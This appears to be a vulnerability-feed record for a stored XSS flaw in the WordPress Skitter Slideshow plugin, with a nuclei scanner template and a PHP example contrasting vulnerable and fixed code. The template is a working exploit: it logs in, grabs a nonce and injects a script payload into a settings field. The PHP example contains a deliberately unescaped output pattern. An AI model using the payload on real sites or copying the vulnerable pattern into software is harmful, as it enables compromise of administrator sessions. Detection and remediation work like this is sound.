Skitter Slideshow <= 2.5.2 - Authenticated (Administrator+) Stored Cross-Site Scripting

Reported: 22 Jun 2026 05:20:07
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com

Stored cross-site scripting exists in Skitter Slideshow up to and including 2.5.2; it is exploitable by authenticated administrators.

Code
id: CVE-2025-28906

info:
  name: Skitter Slideshow <= 2.5.2 - Authenticated (Administrator+) Stored Cross-Site Scripting
  author: nblirwn
  severity: medium
  description: |
    The Skitter Slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.5.2 due to insufficient input sanitization and output escaping.
  impact: |
    Authenticated administrators can inject stored XSS through improperly sanitized configuration parameters, potentially compromising other administrator sessions and gaining persistent control.
  remediation: |
    Upgrade to Skitter Slideshow version 2.5.3 or later that properly sanitizes and escapes configuration inputs.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-skitter-slideshow/skitter-slideshow-252-authenticated-administrator-stored-cross-site-scripting
    - https://wordpress.org/plugins/wp-skitter-slideshow/
    - https://patchstack.com/database/wordpress/plugin/wp-skitter-slideshow/vulnerability/wordpress-skitter-slideshow-plugin-2-5-2-cross-site-scripting-xss-vulnerability
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 5.9
    cve-id: CVE-2025-28906
    cwe-id: CWE-79
    epss-score: 0.00496
    epss-percentile: 0.38559
  metadata:
    verified: true
    max-request: 5
    publicwww-query: "/wp-content/plugins/wp-skitter-slideshow/"
  tags: cve,cve2025,wp-plugin,wp-skitter-slideshow,wordpress,wp,xss,authenticated,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        internal: true
        dsl:
          - "contains(body_1, 'wp-content/plugins/wp-skitter-slideshow/')"

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/options-general.php?page=wp_skitter_menu HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_page=wp_skitter_settings&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_skitter_menu&wp_skitter_type=posts&wp_skitter_category=1&wp_skitter_slides="><script>alert(document.domain)</script>&wp_skitter_xml=&wp_skitter_theme=square&wp_skitter_animation=random&wp_skitter_type_navigation=numbers&wp_skitter_width=&wp_skitter_height=&wp_skitter_background=%23000&wp_skitter_crop=true&wp_skitter_velocity=&wp_skitter_interval=&wp_skitter_navigation=true&wp_skitter_numbers_align=left&wp_skitter_label=true&wp_skitter_label_animation=&wp_skitter_width_label=&wp_skitter_easing_default=&wp_skitter_controls_position=&wp_skitter_focus_position=&wp_skitter_with_animations=&wp_skitter_auto_play=true

      - |
        GET /wp-admin/options-general.php?page=wp_skitter_menu HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_4 == 200"
          - "contains(body_4, '<script>alert(document.domain)</script>')"
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body_2
        group: 1
        internal: true
        regex:
          - 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
# digest: 490a0046304402203f8a086ec459f9f9f34827d042b0500f88b8f9b6a7be00b23f9e5ef66ed3a7890220142346058a5558849e5758a1a51083a503c87f621890d294f9468602f3c590e5:922c64590222798bb761d5b6d8e72950
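Added example, not part of this record and not Skitter Slideshow's own code: a hypothetical WordPress settings field that shows the unsanitized-save, unescaped-output pattern the advisory describes, next to the sanitize-on-save, escape-on-output form that the 2.5.3 remediation refers to. The `example_` function names are assumptions; the WordPress API calls are real.

```php
<?php
// Hypothetical slideshow settings field (assumed names, not the plugin's code).
// Both versions run inside WordPress and rely on its real APIs:
// register_setting(), get_option(), sanitize_text_field(), esc_attr().

// --- Vulnerable pattern the advisory describes ---------------------------
// The option is registered without a sanitize_callback, so whatever an
// administrator submits through options.php is stored verbatim ...
function example_vuln_register() {
    register_setting( 'wp_skitter_settings', 'wp_skitter_slides' );
}

// ... and echoed straight into an attribute on the settings page. A value
// such as  "><script>alert(document.domain)</script>  closes the value=""
// attribute and the <input> tag, and the script runs for every administrator
// who opens the page (the condition the nuclei template above checks for).
function example_vuln_render() {
    $slides = get_option( 'wp_skitter_slides', '' );
    echo '<input type="text" name="wp_skitter_slides" value="' . $slides . '">';
}

// --- Hardened form: sanitize on save, escape on output -------------------
function example_safe_register() {
    register_setting( 'wp_skitter_settings', 'wp_skitter_slides', array(
        'type'              => 'string',
        // Strips tags and control characters before the value reaches the database.
        'sanitize_callback' => 'sanitize_text_field',
        'default'           => '',
    ) );
}
add_action( 'admin_init', 'example_safe_register' );

function example_safe_render() {
    $slides = get_option( 'wp_skitter_slides', '' );
    // esc_attr() encodes " ' < > & so the value cannot break out of the
    // attribute, even if an older, unsanitized value is still stored.
    printf(
        '<input type="text" name="wp_skitter_slides" value="%s">',
        esc_attr( $slides )
    );
}
```

Output escaping is the control that closes the hole on installs where a tainted value is already stored; sanitizing on save stops new payloads from being persisted. On single-site WordPress, administrators already hold the unfiltered_html capability, so the fix matters most on multisite (where only super admins have it) or on installs that remove that capability.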


Scores (as of 04 Feb 2026 07:00):
Vulners AI Score: 7.2 (High risk)
CVSS 3.1: 5.9
EPSS: 0.00496